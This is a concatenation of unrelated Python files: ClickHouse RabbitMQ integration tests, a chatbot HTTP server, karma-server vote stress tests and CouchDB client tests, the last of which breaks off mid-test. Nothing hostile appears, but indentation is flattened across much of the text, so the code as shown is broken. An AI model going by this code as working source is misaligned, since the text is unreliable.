rabbitmq_exchange_name = 'consumer_reconnect',
rabbitmq_num_consumers = 10,
rabbitmq_num_queues = 10,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
i = 0
messages_num = 150000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i, 'value': i}))
i += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='consumer_reconnect', routing_key='', body=messages[msg_id],
properties=pika.BasicProperties(delivery_mode=2, message_id=str(msg_id)))
connection.close()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.consumer_reconnect;
''')
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(0.1)
kill_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
time.sleep(8)
revive_rabbitmq(rabbitmq_cluster.rabbitmq_docker_id)
# while int(instance.query('SELECT count() FROM test.view')) == 0:
# time.sleep(0.1)
# kill_rabbitmq()
# time.sleep(2)
# revive_rabbitmq()
while True:
result = instance.query('SELECT count(DISTINCT key) FROM test.view')
time.sleep(1)
if int(result) == messages_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.consumer_reconnect;
''')
assert int(result) == messages_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_commit_on_block_write(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'block',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'block',
rabbitmq_max_block_size = 100,
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
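    # rabbitmq_max_block_size = 100 forces frequent commits; the DETACH/ATTACH
    # cycle below then checks that already-committed blocks are not re-read,
    # i.e. count() must equal uniqExact(key) in test.view.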
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for message in messages:
channel.basic_publish(exchange='block', routing_key='', body=message)
rabbitmq_thread = threading.Thread(target=produce)
rabbitmq_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('DETACH TABLE test.rabbitmq;')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='rabbitmq'")) == 1:
time.sleep(1)
instance.query('ATTACH TABLE test.rabbitmq;')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
rabbitmq_thread.join()
connection.close()
assert result == 1, 'Messages from RabbitMQ get duplicated!'
def test_rabbitmq_no_connection_at_startup(rabbitmq_cluster):
# no connection when table is initialized
rabbitmq_cluster.pause_container('rabbitmq1')
instance.query('''
CREATE TABLE test.cs (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'cs',
rabbitmq_format = 'JSONEachRow',
rabbitmq_num_consumers = '5',
rabbitmq_row_delimiter = '\\n';
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.cs;
''')
time.sleep(5)
rabbitmq_cluster.unpause_container('rabbitmq1')
    # make sure the RabbitMQ table has finished all of its RabbitMQ setup
time.sleep(10)
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
for i in range(messages_num):
message = json.dumps({'key': i, 'value': i})
channel.basic_publish(exchange='cs', routing_key='', body=message,
properties=pika.BasicProperties(delivery_mode=2, message_id=str(i)))
connection.close()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.cs;
''')
assert int(result) == messages_num, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_format_factory_settings(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.format_settings (
id String, date DateTime
) ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'format_settings',
rabbitmq_format = 'JSONEachRow',
date_time_input_format = 'best_effort';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
message = json.dumps({"id":"format_settings_test","date":"2021-01-19T14:42:33.1829214Z"})
expected = instance.query('''SELECT parseDateTimeBestEffort(CAST('2021-01-19T14:42:33.1829214Z', 'String'))''')
channel.basic_publish(exchange='format_settings', routing_key='', body=message)
result = ''
while True:
result = instance.query('SELECT date FROM test.format_settings')
if result == expected:
            break
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (
id String, date DateTime
) ENGINE = MergeTree ORDER BY id;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.format_settings;
''')
channel.basic_publish(exchange='format_settings', routing_key='', body=message)
result = ''
while True:
result = instance.query('SELECT date FROM test.view')
if result == expected:
            break
connection.close()
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.format_settings;
''')
assert(result == expected)
def test_rabbitmq_vhost(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq_vhost (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'vhost',
rabbitmq_format = 'JSONEachRow',
rabbitmq_vhost = '/'
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.basic_publish(exchange='vhost', routing_key='', body=json.dumps({'key': 1, 'value': 2}))
connection.close()
while True:
result = instance.query('SELECT * FROM test.rabbitmq_vhost ORDER BY key', ignore_error=True)
if result == "1\t2\n":
break
def test_rabbitmq_drop_table_properly(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq_drop (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'drop',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'rabbit_queue_drop'
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.basic_publish(exchange='drop', routing_key='', body=json.dumps({'key': 1, 'value': 2}))
while True:
result = instance.query('SELECT * FROM test.rabbitmq_drop ORDER BY key', ignore_error=True)
if result == "1\t2\n":
break
exists = channel.queue_declare(queue='rabbit_queue_drop', passive=True)
assert(exists)
instance.query("DROP TABLE test.rabbitmq_drop")
time.sleep(30)
try:
        exists = channel.queue_declare(queue='rabbit_queue_drop', passive=True)
    except Exception:
exists = False
assert(not exists)
def test_rabbitmq_queue_settings(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq_settings (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'rabbit_exchange',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'rabbit_queue_settings',
rabbitmq_queue_settings_list = 'x-max-length=10,x-overflow=reject-publish'
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
for i in range(50):
channel.basic_publish(exchange='rabbit_exchange', routing_key='', body=json.dumps({'key': 1, 'value': 2}))
connection.close()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq_settings;
''')
time.sleep(5)
result = instance.query('SELECT count() FROM test.rabbitmq_settings', ignore_error=True)
while int(result) != 10:
time.sleep(0.5)
result = instance.query('SELECT count() FROM test.view', ignore_error=True)
instance.query('DROP TABLE test.rabbitmq_settings')
    # The queue is capped at 10 messages but 50 were sent; the excess is rejected (x-overflow = reject-publish), so only 10 remain.
assert(int(result) == 10)
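# Hedged sketch (not part of the original tests): declaring a queue with the same
# limit directly through pika would look roughly like this; the queue name is
# illustrative only.
def _declare_limited_queue_sketch(channel, queue_name='rabbit_queue_settings_example'):
    # x-max-length caps the queue at 10 messages and x-overflow=reject-publish makes
    # the broker refuse extra publishes instead of dropping the oldest messages.
    return channel.queue_declare(queue=queue_name,
                                 arguments={'x-max-length': 10, 'x-overflow': 'reject-publish'})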
def test_rabbitmq_queue_consume(rabbitmq_cluster):
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.queue_declare(queue='rabbit_queue', durable=True)
i = [0]
messages_num = 1000
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
message = json.dumps({'key': i[0], 'value': i[0]})
channel.basic_publish(exchange='', routing_key='rabbit_queue', body=message)
i[0] += 1
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query('''
CREATE TABLE test.rabbitmq_queue (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_format = 'JSONEachRow',
rabbitmq_queue_base = 'rabbit_queue',
rabbitmq_queue_consume = 1;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq_queue;
''')
result = ''
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == messages_num * threads_num:
break
time.sleep(1)
for thread in threads:
thread.join()
instance.query('DROP TABLE test.rabbitmq_queue')
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
chatServer.py
|
import os
import sys
import time
import queue
import train
import requests
import datetime
import threading
import jieba
import http.server
from os import path
from hparams import Hparams
from cgi import parse_header
from urllib.parse import parse_qs
from chat_settings import ChatSettings
from chat import ChatSession
waiting_queue = queue.Queue()
chat_setting = None
result_queue = dict()
class Struct():
def __init__(self, id, data):
self.id = id
self.data = data
ids = set()
class ServerClass(http.server.CGIHTTPRequestHandler):
def __init__(self, request, client_address, server):
super().__init__(request, client_address, server)
def do_POST(self):
ctype, pdict = parse_header(self.headers['content-type'])
if ctype == 'application/x-www-form-urlencoded':
length = int(self.headers['content-length'])
postvars = parse_qs(self.rfile.read(length).decode(), keep_blank_values=1)
question = ' '.join(jieba.cut(postvars['question'][0]))
print('chat :{} {}'.format(postvars['id'], question))
if postvars['id'][0] in ids:
print('ignore')
self.send_response(200)
self.end_headers()
self.wfile.write(b'success')
return
ids.add(postvars['id'][0])
waiting_queue.put(Struct(postvars['id'][0], question))
start_time = time.time()
while time.time() - start_time < 10 and result_queue.get(postvars['id'][0], None) is None:
                time.sleep(0.01)  # poll briefly instead of hot-spinning while waiting for the worker thread
response = result_queue.pop(postvars['id'][0], 'server timeout :(')
self.send_response(200)
self.end_headers()
self.wfile.write(response.encode())
ids.remove(postvars['id'][0])
else:
self.send_response(200)
self.end_headers()
            self.wfile.write(b'wrong')
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('ok'.encode())
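# Hedged sketch (not part of the original server): what a matching client call
# could look like; the host, port and id are illustrative only.
def _example_client_request(host='127.0.0.1', port=4321, question='hello'):
    # do_POST expects form-encoded 'id' and 'question' fields and replies with
    # plain text (the chatbot answer, or 'server timeout :(' after 10 seconds).
    return requests.post('http://{}:{}'.format(host, port),
                         data={'id': 'example-client', 'question': question}).text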
class ChatServer(object):
def __init__(self, training):
if training:
checkpointfile = r'models\best_weights_training.ckpt'
# Make sure checkpoint file & hparams file exists
checkpoint_filepath = os.path.relpath(checkpointfile)
model_dir = os.path.dirname(checkpoint_filepath)
hparams = Hparams()
global chat_setting
# Setting up the chat
self.chatlog_filepath = path.join(model_dir, "chat_logs", "chatlog_{0}.txt".format(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")))
chat_setting = self.chat_settings = ChatSettings(hparams.inference_hparams)
# chat_command_handler.print_commands()
self.train_thred = threading.Thread(target=train.train, args=(waiting_queue, chat_setting, result_queue))
self.train_thred.start()
else:
def server_thread_function():
sess = ChatSession()
while True:
if not waiting_queue.empty():
q = waiting_queue.get()
if q.data == 'version':
t = os.path.getmtime('models/best_weights_training.ckpt.data-00000-of-00001')
result_queue[q.id] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(t))
else:
result_queue[q.id] = sess.chat(q.data)
print(result_queue[q.id])
threading.Thread(target=server_thread_function).start()
try:
myip = requests.get('http://fun.alphamj.cn/wx/registered').content.decode()
        except Exception:
myip = '127.0.0.1'
print('listen {}:4321'.format(myip))
self.server = http.server.HTTPServer((myip, 4321), ServerClass)
print('server init finish')
if __name__ == '__main__':
jieba.initialize()
s = ChatServer(len(sys.argv) > 1 and sys.argv[1] == 'train')
s.server.serve_forever()
|
validation_tester.py
|
''' Test module for the Validation Provider '''
import threading
import time
from math import floor
from random import random, randint
import requests
import karmaserver.utils as utils
from karmaserver.constants import ENDPOINT, MINIMUM_VOTES, VOTES_TO_DISPUTED
from karmaserver.tests.test import TestAbstract
from karmaserver.data.models.observation import State
class CreateRandomObservationTest(TestAbstract):
''' Creates one Observation '''
def __init__(self):
self.dictionary = _generate_observation()
self.error_message = ''
def run(self):
status, response, _ = _call_server(self.dictionary)
if not status:
self.error_message = response
return status
def get_result(self):
if self.error_message:
return self.error_message
return ''
class StressValidationTest(TestAbstract):
    ''' Sends random validations concurrently from several threads '''
def __init__(self):
self.result = []
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return self.error_message is None
def __get_thread_list(self):
threads = []
for _ in range(10):
thread = threading.Thread(target=self.__run, args=(2,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
dictionary = _generate_observation()
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class ApproveObservationTest(TestAbstract):
    ''' Sends enough positive votes to drive one observation to the APPROVED state '''
def __init__(self):
self.result = []
self.obs_id = utils.generate_test_name()
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
observation = _generate_observation(obs_id=self.obs_id, vote_type=True)
status, response, _ = _call_server(observation)
code = response['code']
        state = response['payload']['state']
        return self.error_message is None and code == 200 and state == State.APPROVED.value
def __get_thread_list(self):
threads = []
number_of_requests = 2
number_of_threads = (MINIMUM_VOTES + 5) / number_of_requests
for _ in range(floor(number_of_threads)):
thread = threading.Thread(target=self.__run, args=(number_of_requests,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
dictionary = _generate_observation(obs_id=self.obs_id, vote_type=True)
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class DenyObservationTest(TestAbstract):
    ''' Sends enough negative votes to drive one observation to the denied (State.DENYED) state '''
def __init__(self):
self.result = []
self.obs_id = utils.generate_test_name()
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
observation = _generate_observation(obs_id=self.obs_id, vote_type=False)
status, response, _ = _call_server(observation)
code = response['code']
        state = response['payload']['state']
        return self.error_message is None and code == 200 and state == State.DENYED.value
def __get_thread_list(self):
threads = []
number_of_requests = 2
number_of_threads = (MINIMUM_VOTES + 5) / number_of_requests
for _ in range(floor(number_of_threads)):
thread = threading.Thread(target=self.__run, args=(number_of_requests,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
dictionary = _generate_observation(obs_id=self.obs_id, vote_type=False)
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class DisputeObservationTest(TestAbstract):
    ''' Sends alternating votes to drive one observation to the DISPUTED state '''
def __init__(self):
self.result = []
self.obs_id = utils.generate_test_name()
self.error_message = None
def run(self):
threads = self.__get_thread_list()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
observation = _generate_observation(obs_id=self.obs_id, karma_level=1)
status, response, _ = _call_server(observation)
code = response['code']
        state = response['payload']['state']
        return self.error_message is None and code == 200 and state == State.DISPUTED.value
def __get_thread_list(self):
threads = []
        number_of_requests = VOTES_TO_DISPUTED
for _ in range(2):
thread = threading.Thread(target=self.__run, args=(number_of_requests,))
threads.append(thread)
return threads
def get_result(self):
if self.error_message:
return self.error_message
elapsed = floor(sum(self.result)/len(self.result))
return f'(Average request time {elapsed} ns)'
def __run(self, number_of_requests):
cont = 1
while cont < number_of_requests:
vote_type = (cont % 2) == 0
dictionary = _generate_observation(obs_id=self.obs_id, vote_type=vote_type, karma_level=1)
status, response, time_ = _call_server(dictionary)
if not status:
self.error_message = response
return
self.result.append(time_)
cont = cont + 1
if cont != number_of_requests:
self.error_message = 'Exception in server'
class DoubleUserObservationTest(TestAbstract):
    ''' Sends the same vote twice; the second must receive a Bad Request (400) '''
def __init__(self):
self.dictionary = _generate_observation()
self.error_message = ''
def run(self):
_call_server(self.dictionary)
status, response, _ = _call_server(self.dictionary)
if not status:
self.error_message = response
return status and response['code'] == 400
def get_result(self):
if self.error_message:
return self.error_message
return ''
class MultipleVotesInSameObservationTest(TestAbstract):
    ''' Sends multiple votes to the same observation from different users '''
def __init__(self):
self.error_message = ''
self.observation_id = f'test-{time.time()}'
def run(self):
for item in range(10):
observation = _generate_observation(user_id=f'{self.observation_id}{item}',
obs_id=self.observation_id)
status, response, _ = _call_server(observation)
if not status:
self.error_message = response
                return False
return status
def get_result(self):
if self.error_message:
return self.error_message
return ''
class NoObservationTest(TestAbstract):
    ''' Sends an empty payload; must receive a Bad Request (400) '''
def __init__(self):
self.dictionary = _generate_observation()
self.error_message = ''
def run(self):
status, response, _ = _call_server(None)
if not status:
self.error_message = response
return status and response['code'] == 400
def get_result(self):
if self.error_message:
return self.error_message
return ''
def _call_server(dictionary):
try:
response = requests.post(f'{ENDPOINT}/validation/vote',
json=dictionary)
time_ = float(response.headers['Request-Time'].replace(" ns", ""))
return True, response.json(), time_
except requests.exceptions.ConnectionError:
return False, 'Could not connect to the server', None
def _generate_observation(user_id=None, karma_level=None, vote_type=None, obs_id=None):
if user_id is None:
user_id = randint(1, 1000)
if vote_type is None:
vote_type = random() < 0.75
if karma_level is None:
karma_level = randint(1, 1000)
if obs_id is None:
obs_id = randint(1, 1000)
dictionary = {
"user_info": {
"_id": user_id
},
"vote_info": {
"karma_level": karma_level,
"vote_type": vote_type
},
"observation_info": {
"_id": obs_id,
"brightness": floor(random() * 20 + 5),
"image": {
"_id": obs_id,
"fwhm": floor(random() * 10 - 5),
"probability": floor(random() * 100),
"x_size": 100,
"y_size": 100
},
"votes": {
"upvotes":0,
"downvotes":0
},
"position": {
"x": 12,
"y": 15
}
}
}
return dictionary
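# Hedged usage sketch (not one of the registered tests): posting a single random
# vote outside the TestAbstract framework.
def _example_single_vote():
    ok, response, elapsed_ns = _call_server(_generate_observation())
    # ok is False only when the server is unreachable; otherwise response is the
    # decoded JSON body and elapsed_ns comes from the 'Request-Time' header.
    return ok, response, elapsed_ns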
|
client.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2009 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
from datetime import datetime
import doctest
import os
import os.path
import shutil
from StringIO import StringIO
import time
import tempfile
import threading
import unittest
import urlparse
from couchdb import client, http
from couchdb.tests import testutil
class ServerTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_init_with_resource(self):
sess = http.Session()
res = http.Resource(client.DEFAULT_BASE_URL, sess)
serv = client.Server(url=res)
serv.config()
def test_init_with_session(self):
sess = http.Session()
serv = client.Server(client.DEFAULT_BASE_URL, session=sess)
serv.config()
self.assertTrue(serv.resource.session is sess)
def test_exists(self):
self.assertTrue(client.Server(client.DEFAULT_BASE_URL))
self.assertFalse(client.Server('http://localhost:9999'))
def test_repr(self):
repr(self.server)
def test_server_vars(self):
version = self.server.version()
self.assertTrue(isinstance(version, basestring))
config = self.server.config()
self.assertTrue(isinstance(config, dict))
tasks = self.server.tasks()
self.assertTrue(isinstance(tasks, list))
def test_server_stats(self):
stats = self.server.stats()
self.assertTrue(isinstance(stats, dict))
stats = self.server.stats('httpd/requests')
self.assertTrue(isinstance(stats, dict))
self.assertTrue(len(stats) == 1 and len(stats['httpd']) == 1)
def test_get_db_missing(self):
self.assertRaises(http.ResourceNotFound,
lambda: self.server['couchdb-python/missing'])
def test_create_db_conflict(self):
name, db = self.temp_db()
self.assertRaises(http.PreconditionFailed, self.server.create,
name)
def test_delete_db(self):
name, db = self.temp_db()
assert name in self.server
self.del_db(name)
assert name not in self.server
def test_delete_db_missing(self):
self.assertRaises(http.ResourceNotFound, self.server.delete,
'couchdb-python/missing')
def test_replicate(self):
aname, a = self.temp_db()
bname, b = self.temp_db()
id, rev = a.save({'test': 'a'})
result = self.server.replicate(aname, bname)
self.assertEquals(result['ok'], True)
self.assertEquals(b[id]['test'], 'a')
doc = b[id]
doc['test'] = 'b'
b.update([doc])
self.server.replicate(bname, aname)
self.assertEquals(a[id]['test'], 'b')
self.assertEquals(b[id]['test'], 'b')
def test_replicate_continuous(self):
aname, a = self.temp_db()
bname, b = self.temp_db()
result = self.server.replicate(aname, bname, continuous=True)
self.assertEquals(result['ok'], True)
version = tuple(int(i) for i in self.server.version().split('.')[:2])
if version >= (0, 10):
self.assertTrue('_local_id' in result)
def test_iter(self):
aname, a = self.temp_db()
bname, b = self.temp_db()
dbs = list(self.server)
self.assertTrue(aname in dbs)
self.assertTrue(bname in dbs)
def test_len(self):
self.temp_db()
self.temp_db()
self.assertTrue(len(self.server) >= 2)
def test_uuids(self):
ls = self.server.uuids()
assert type(ls) == list
ls = self.server.uuids(count=10)
assert type(ls) == list and len(ls) == 10
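# Hedged sketch (not one of the original test cases): the minimal couchdb-python
# round trip that ServerTestCase exercises piecewise; the database name is
# illustrative only.
def _example_server_roundtrip():
    server = client.Server(client.DEFAULT_BASE_URL)
    db = server.create('couchdb-python/example')
    doc_id, _rev = db.save({'type': 'example'})
    assert db[doc_id]['type'] == 'example'
    server.delete('couchdb-python/example')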
class DatabaseTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_save_new(self):
doc = {'foo': 'bar'}
id, rev = self.db.save(doc)
self.assertTrue(id is not None)
self.assertTrue(rev is not None)
self.assertEqual((id, rev), (doc['_id'], doc['_rev']))
doc = self.db.get(id)
self.assertEqual(doc['foo'], 'bar')
def test_save_new_with_id(self):
doc = {'_id': 'foo'}
id, rev = self.db.save(doc)
self.assertTrue(doc['_id'] == id == 'foo')
self.assertEqual(doc['_rev'], rev)
def test_save_existing(self):
doc = {}
id_rev_old = self.db.save(doc)
doc['foo'] = True
id_rev_new = self.db.save(doc)
self.assertTrue(doc['_rev'] == id_rev_new[1])
self.assertTrue(id_rev_old[1] != id_rev_new[1])
def test_save_new_batch(self):
doc = {'_id': 'foo'}
id, rev = self.db.save(doc, batch='ok')
self.assertTrue(rev is None)
self.assertTrue('_rev' not in doc)
def test_save_existing_batch(self):
doc = {'_id': 'foo'}
self.db.save(doc)
id_rev_old = self.db.save(doc)
id_rev_new = self.db.save(doc, batch='ok')
self.assertTrue(id_rev_new[1] is None)
self.assertEqual(id_rev_old[1], doc['_rev'])
def test_exists(self):
self.assertTrue(self.db)
self.assertFalse(client.Database('couchdb-python/missing'))
def test_name(self):
# Access name assigned during creation.
name, db = self.temp_db()
self.assertTrue(db.name == name)
        # Access lazily loaded name.
self.assertTrue(client.Database(db.resource.url).name == name)
def test_commit(self):
self.assertTrue(self.db.commit()['ok'] == True)
def test_create_large_doc(self):
        self.db['foo'] = {'data': '0123456789' * 110 * 1024}  # ~1 MB
self.assertEqual('foo', self.db['foo']['_id'])
def test_doc_id_quoting(self):
self.db['foo/bar'] = {'foo': 'bar'}
self.assertEqual('bar', self.db['foo/bar']['foo'])
del self.db['foo/bar']
self.assertEqual(None, self.db.get('foo/bar'))
def test_unicode(self):
self.db[u'føø'] = {u'bår': u'Iñtërnâtiônàlizætiøn', 'baz': 'ASCII'}
self.assertEqual(u'Iñtërnâtiônàlizætiøn', self.db[u'føø'][u'bår'])
self.assertEqual(u'ASCII', self.db[u'føø'][u'baz'])
def test_disallow_nan(self):
try:
self.db['foo'] = {'number': float('nan')}
self.fail('Expected ValueError')
except ValueError:
pass
def test_disallow_none_id(self):
deldoc = lambda: self.db.delete({'_id': None, '_rev': None})
self.assertRaises(ValueError, deldoc)
def test_doc_revs(self):
doc = {'bar': 42}
self.db['foo'] = doc
old_rev = doc['_rev']
doc['bar'] = 43
self.db['foo'] = doc
new_rev = doc['_rev']
new_doc = self.db.get('foo')
self.assertEqual(new_rev, new_doc['_rev'])
new_doc = self.db.get('foo', rev=new_rev)
self.assertEqual(new_rev, new_doc['_rev'])
old_doc = self.db.get('foo', rev=old_rev)
self.assertEqual(old_rev, old_doc['_rev'])
revs = [i for i in self.db.revisions('foo')]
self.assertEqual(revs[0]['_rev'], new_rev)
self.assertEqual(revs[1]['_rev'], old_rev)
gen = self.db.revisions('crap')
self.assertRaises(StopIteration, lambda: gen.next())
self.assertTrue(self.db.compact())
while self.db.info()['compact_running']:
pass
# 0.10 responds with 404, 0.9 responds with 500, same content
doc = 'fail'
try:
doc = self.db.get('foo', rev=old_rev)
except http.ServerError:
doc = None
assert doc is None
def test_attachment_crud(self):
doc = {'bar': 42}
self.db['foo'] = doc
old_rev = doc['_rev']
self.db.put_attachment(doc, 'Foo bar', 'foo.txt', 'text/plain')
self.assertNotEquals(old_rev, doc['_rev'])
doc = self.db['foo']
attachment = doc['_attachments']['foo.txt']
self.assertEqual(len('Foo bar'), attachment['length'])
self.assertEqual('text/plain', attachment['content_type'])
self.assertEqual('Foo bar',
self.db.get_attachment(doc, 'foo.txt').read())
self.assertEqual('Foo bar',
self.db.get_attachment('foo', 'foo.txt').read())
old_rev = doc['_rev']
self.db.delete_attachment(doc, 'foo.txt')
self.assertNotEquals(old_rev, doc['_rev'])
self.assertEqual(None, self.db['foo'].get('_attachments'))
def test_attachment_crud_with_files(self):
doc = {'bar': 42}
self.db['foo'] = doc
old_rev = doc['_rev']
fileobj = StringIO('Foo bar baz')
self.db.put_attachment(doc, fileobj, 'foo.txt')
self.assertNotEquals(old_rev, doc['_rev'])
doc = self.db['foo']
attachment = doc['_attachments']['foo.txt']
self.assertEqual(len('Foo bar baz'), attachment['length'])
self.assertEqual('text/plain', attachment['content_type'])
self.assertEqual('Foo bar baz',
self.db.get_attachment(doc, 'foo.txt').read())
self.assertEqual('Foo bar baz',
self.db.get_attachment('foo', 'foo.txt').read())
old_rev = doc['_rev']
self.db.delete_attachment(doc, 'foo.txt')
